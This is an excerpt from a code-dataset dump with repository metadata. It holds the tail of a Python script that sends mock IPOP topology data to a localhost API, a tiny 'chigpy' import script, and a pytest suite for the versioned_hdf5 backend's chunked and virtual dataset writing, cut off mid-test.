# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N3'
#},
'LN1N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N1'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN2N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN2N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
#'LN2N4': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N4'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N2'
},
{
'Data': {
'O1': {
'LinkManager': {
#'LN3N1': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N1'
#},
'LN3N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
#'LN3N4': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N4'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N3'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN4N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
#'LN4N2': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N2'
#},
#'LN4N3': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N3'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N4'
}
]
if __name__ == '__main__':
tick = 0
while True:
if tick % 2:
reqs = odd_tick_reqs
which = 'odd'
else:
reqs = even_tick_requs
which = 'even'
for r in reqs:
node_id = r['NodeId']
logging.info('Making {} request for node_id {}' \
.format(which, node_id))
requests.put('http://localhost:5000/IPOP/nodes/'+node_id,
data=json.dumps(r), headers={'Content-Type':
'application/json'})
tick += 1
logging.info('Sleeping for 15...')
time.sleep(15)
| 28.577844
| 74
| 0.280775
| 667
| 9,545
| 3.868066
| 0.137931
| 0.049612
| 0.130233
| 0.186047
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0
| 0.158202
| 0.568884
| 9,545
| 333
| 75
| 28.663664
| 0.468773
| 0.079832
| 0
| 0.58156
| 0
| 0
| 0.246196
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014184
| 0
| 0.014184
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
be84875c296b27e763474c2405cae5a0ab2dfc8b
| 53
|
py
|
Python
|
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
import chigpy
print(chigpy)
print(chigpy.full_name)
| 10.6
| 23
| 0.811321
| 8
| 53
| 5.25
| 0.625
| 0.52381
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 53
| 4
| 24
| 13.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
fe26392562e859041cc64f3f1d8c00dbbabc2345
| 23,700
|
py
|
Python
|
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from numpy.testing import assert_equal
from ndindex import Slice, Tuple
from pytest import mark, raises
import itertools
from .helpers import setup
from ..backend import (create_base_dataset, write_dataset,
create_virtual_dataset, DEFAULT_CHUNK_SIZE,
write_dataset_chunks)
from ..slicetools import split_chunks
CHUNK_SIZE_3D = 2**4 # = cbrt(DEFAULT_CHUNK_SIZE)
def test_initialize():
with setup() as f:
pass
f.close()
def test_create_base_dataset(h5file):
create_base_dataset(h5file, 'test_data', data=np.ones((DEFAULT_CHUNK_SIZE,)))
assert h5file['_version_data/test_data/raw_data'].dtype == np.float64
def test_create_base_dataset_multidimension(h5file):
create_base_dataset(h5file, 'test_data', data=np.ones((CHUNK_SIZE_3D, CHUNK_SIZE_3D, 2)),
chunks=(CHUNK_SIZE_3D, CHUNK_SIZE_3D, CHUNK_SIZE_3D))
assert h5file['_version_data/test_data/raw_data'].dtype == np.float64
def test_write_dataset(h5file):
slices1 = write_dataset(h5file, 'test_data', np.ones((2*DEFAULT_CHUNK_SIZE,)))
slices2 = write_dataset(h5file, 'test_data',
np.concatenate((2*np.ones((DEFAULT_CHUNK_SIZE,)),
2*np.ones((DEFAULT_CHUNK_SIZE,)),
3*np.ones((DEFAULT_CHUNK_SIZE,)),
)))
assert slices1 == {
(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE)}
assert slices2 == {
(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1),):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE, 1),):
slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE)}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (3*DEFAULT_CHUNK_SIZE,)
assert_equal(ds[0:1*DEFAULT_CHUNK_SIZE], 1.0)
assert_equal(ds[1*DEFAULT_CHUNK_SIZE:2*DEFAULT_CHUNK_SIZE], 2.0)
assert_equal(ds[2*DEFAULT_CHUNK_SIZE:3*DEFAULT_CHUNK_SIZE], 3.0)
assert_equal(ds[3*DEFAULT_CHUNK_SIZE:4*DEFAULT_CHUNK_SIZE], 0.0)
assert ds.dtype == np.float64
def test_write_dataset_multidimension(h5file):
chunks = 3*(CHUNK_SIZE_3D,)
data = np.zeros((2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D))
slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
data2 = data.copy()
for n, (i, j, k) in enumerate(itertools.product([0, 1], repeat=3)):
data2[i*CHUNK_SIZE_3D:(i+1)*CHUNK_SIZE_3D,
j*CHUNK_SIZE_3D:(j+1)*CHUNK_SIZE_3D,
k*CHUNK_SIZE_3D:(k+1)*CHUNK_SIZE_3D] = n
slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
assert slices1 == {
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
}
assert slices2 == {
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(2*CHUNK_SIZE_3D, 3*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(3*CHUNK_SIZE_3D, 4*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(4*CHUNK_SIZE_3D, 5*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(5*CHUNK_SIZE_3D, 6*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(6*CHUNK_SIZE_3D, 7*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 1),
): slice(7*CHUNK_SIZE_3D, 8*CHUNK_SIZE_3D),
}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (8*CHUNK_SIZE_3D, CHUNK_SIZE_3D, CHUNK_SIZE_3D)
for n in range(8):
assert_equal(ds[n*CHUNK_SIZE_3D:(n+1)*CHUNK_SIZE_3D], n)
assert ds.dtype == np.float64
def test_write_dataset_chunks(h5file):
slices1 = write_dataset(h5file, 'test_data', np.ones((2*DEFAULT_CHUNK_SIZE,)))
slices2 = write_dataset_chunks(h5file, 'test_data', {
Tuple(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1)):
slices1[Tuple(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1))],
Tuple(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1)): 2*np.ones((DEFAULT_CHUNK_SIZE,)),
Tuple(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE, 1)): 2*np.ones((DEFAULT_CHUNK_SIZE,)),
Tuple(Slice(3*DEFAULT_CHUNK_SIZE, 4*DEFAULT_CHUNK_SIZE, 1)): 3*np.ones((DEFAULT_CHUNK_SIZE,)),
})
assert slices1 == {
Tuple(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1)):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
Tuple(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1)):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
}
assert slices2 == {
Tuple(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1)):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
Tuple(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1)):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
Tuple(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE, 1)):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
Tuple(Slice(3*DEFAULT_CHUNK_SIZE, 4*DEFAULT_CHUNK_SIZE, 1)):
slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE),
}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (3*DEFAULT_CHUNK_SIZE,)
assert_equal(ds[0:1*DEFAULT_CHUNK_SIZE], 1.0)
assert_equal(ds[1*DEFAULT_CHUNK_SIZE:2*DEFAULT_CHUNK_SIZE], 2.0)
assert_equal(ds[2*DEFAULT_CHUNK_SIZE:3*DEFAULT_CHUNK_SIZE], 3.0)
assert_equal(ds[3*DEFAULT_CHUNK_SIZE:4*DEFAULT_CHUNK_SIZE], 0.0)
assert ds.dtype == np.float64
def test_write_dataset_chunks_multidimension(h5file):
chunks = 3*(CHUNK_SIZE_3D,)
shape = (2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D)
data = np.zeros(shape)
slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
data_dict = {}
for n, c in enumerate(split_chunks(shape, chunks)):
if n == 0:
data_dict[c] = slices1[c]
else:
data_dict[c] = n*np.ones(chunks)
slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
slices2 = write_dataset_chunks(h5file, 'test_data', data_dict)
assert slices1 == {c: slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D) for c in
split_chunks(shape, chunks)}
assert slices2 == {c: slice(i*CHUNK_SIZE_3D, (i+1)*CHUNK_SIZE_3D) for
i, c in enumerate(split_chunks(shape, chunks))}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (8*CHUNK_SIZE_3D, CHUNK_SIZE_3D, CHUNK_SIZE_3D)
for n in range(8):
assert_equal(ds[n*CHUNK_SIZE_3D:(n+1)*CHUNK_SIZE_3D], n)
assert ds.dtype == np.float64
def test_write_dataset_offset(h5file):
slices1 = write_dataset(h5file, 'test_data', np.ones((2*DEFAULT_CHUNK_SIZE,)))
slices2 = write_dataset(h5file, 'test_data',
np.concatenate((2*np.ones((DEFAULT_CHUNK_SIZE,)),
2*np.ones((DEFAULT_CHUNK_SIZE,)),
3*np.ones((DEFAULT_CHUNK_SIZE - 2,)))))
assert slices1 == {
(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE),
(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),):
slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE)}
assert slices2 == {
(Slice(0*DEFAULT_CHUNK_SIZE, 1*DEFAULT_CHUNK_SIZE, 1),):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),):
slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE),
(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE - 2, 1),):
slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE - 2)}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (3*DEFAULT_CHUNK_SIZE,)
assert_equal(ds[0*DEFAULT_CHUNK_SIZE:1*DEFAULT_CHUNK_SIZE], 1.0)
assert_equal(ds[1*DEFAULT_CHUNK_SIZE:2*DEFAULT_CHUNK_SIZE], 2.0)
assert_equal(ds[2*DEFAULT_CHUNK_SIZE:3*DEFAULT_CHUNK_SIZE - 2], 3.0)
assert_equal(ds[3*DEFAULT_CHUNK_SIZE-2:4*DEFAULT_CHUNK_SIZE], 0.0)
def test_write_dataset_offset_multidimension(h5file):
chunks = 3*(CHUNK_SIZE_3D,)
shape = (2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D)
data = np.zeros(shape)
slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
shape2 = (2*CHUNK_SIZE_3D - 2, 2*CHUNK_SIZE_3D - 2,
2*CHUNK_SIZE_3D - 2)
data2 = np.empty(shape2)
for n, c in enumerate(split_chunks(shape, chunks)):
data2[c.raw] = n
slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
assert slices1 == {
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D , 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
}
assert slices2 == {
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
): slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(2*CHUNK_SIZE_3D, 3*CHUNK_SIZE_3D),
(Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
): slice(3*CHUNK_SIZE_3D, 4*CHUNK_SIZE_3D),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(4*CHUNK_SIZE_3D, 5*CHUNK_SIZE_3D - 2),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
): slice(5*CHUNK_SIZE_3D, 6*CHUNK_SIZE_3D - 2),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(0*CHUNK_SIZE_3D, 1*CHUNK_SIZE_3D, 1),
): slice(6*CHUNK_SIZE_3D, 7*CHUNK_SIZE_3D - 2),
(Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
Slice(1*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D - 2, 1),
): slice(7*CHUNK_SIZE_3D, 8*CHUNK_SIZE_3D - 2),
}
ds = h5file['/_version_data/test_data/raw_data']
assert ds.shape == (8*CHUNK_SIZE_3D, CHUNK_SIZE_3D, CHUNK_SIZE_3D)
for n, c in enumerate(split_chunks(shape2, chunks)):
a = np.zeros(chunks)
a[Tuple(*[slice(0, i) for i in shape2]).as_subindex(c).raw] = n
assert_equal(ds[n*CHUNK_SIZE_3D:(n+1)*CHUNK_SIZE_3D], a)
assert ds.dtype == np.float64
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset(h5file):
with h5file as f:
slices1 = write_dataset(f, 'test_data', np.ones((2*DEFAULT_CHUNK_SIZE,)))
slices2 = write_dataset(f, 'test_data',
np.concatenate((2*np.ones((DEFAULT_CHUNK_SIZE,)),
3*np.ones((DEFAULT_CHUNK_SIZE,)))))
virtual_data = create_virtual_dataset(f, 'test_version', 'test_data',
{**slices1,
Tuple(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE, 1),):
slices2[(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE, 1),)]})
assert virtual_data.shape == (3*DEFAULT_CHUNK_SIZE,)
assert_equal(virtual_data[0:2*DEFAULT_CHUNK_SIZE], 1.0)
assert_equal(virtual_data[2*DEFAULT_CHUNK_SIZE:3*DEFAULT_CHUNK_SIZE], 3.0)
assert virtual_data.dtype == np.float64
@mark.setup_args(version_name=['test_version1', 'test_version2'])
def test_create_virtual_dataset_multidimension(h5file):
chunks = 3*(CHUNK_SIZE_3D,)
shape = (2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D, 2*CHUNK_SIZE_3D)
data = np.ones(shape)
slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
virtual_data = create_virtual_dataset(h5file, 'test_version1', 'test_data', slices1)
assert virtual_data.shape == shape
assert_equal(virtual_data[:], 1)
assert virtual_data.dtype == np.float64
data2 = data.copy()
for n, (i, j, k) in enumerate(itertools.product([0, 1], repeat=3)):
data2[i*CHUNK_SIZE_3D:(i+1)*CHUNK_SIZE_3D,
j*CHUNK_SIZE_3D:(j+1)*CHUNK_SIZE_3D,
k*CHUNK_SIZE_3D:(k+1)*CHUNK_SIZE_3D] = n
slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
virtual_data2 = create_virtual_dataset(h5file, 'test_version2', 'test_data', slices2)
assert virtual_data2.shape == shape
for n, (i, j, k) in enumerate(itertools.product([0, 1], repeat=3)):
assert_equal(virtual_data2[i*CHUNK_SIZE_3D:(i+1)*CHUNK_SIZE_3D,
j*CHUNK_SIZE_3D:(j+1)*CHUNK_SIZE_3D,
k*CHUNK_SIZE_3D:(k+1)*CHUNK_SIZE_3D], n)
assert virtual_data2.dtype == np.float64
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset_offset(h5file):
slices1 = write_dataset(h5file, 'test_data', np.ones((2*DEFAULT_CHUNK_SIZE,)))
slices2 = write_dataset(h5file, 'test_data',
np.concatenate((2*np.ones((DEFAULT_CHUNK_SIZE,)),
3*np.ones((DEFAULT_CHUNK_SIZE - 2,)))))
virtual_data = create_virtual_dataset(h5file, 'test_version', 'test_data',
{**slices1,
Tuple(Slice(2*DEFAULT_CHUNK_SIZE, 3*DEFAULT_CHUNK_SIZE - 2, 1),):
slices2[(Slice(1*DEFAULT_CHUNK_SIZE, 2*DEFAULT_CHUNK_SIZE - 2, 1),)]})
assert virtual_data.shape == (3*DEFAULT_CHUNK_SIZE - 2,)
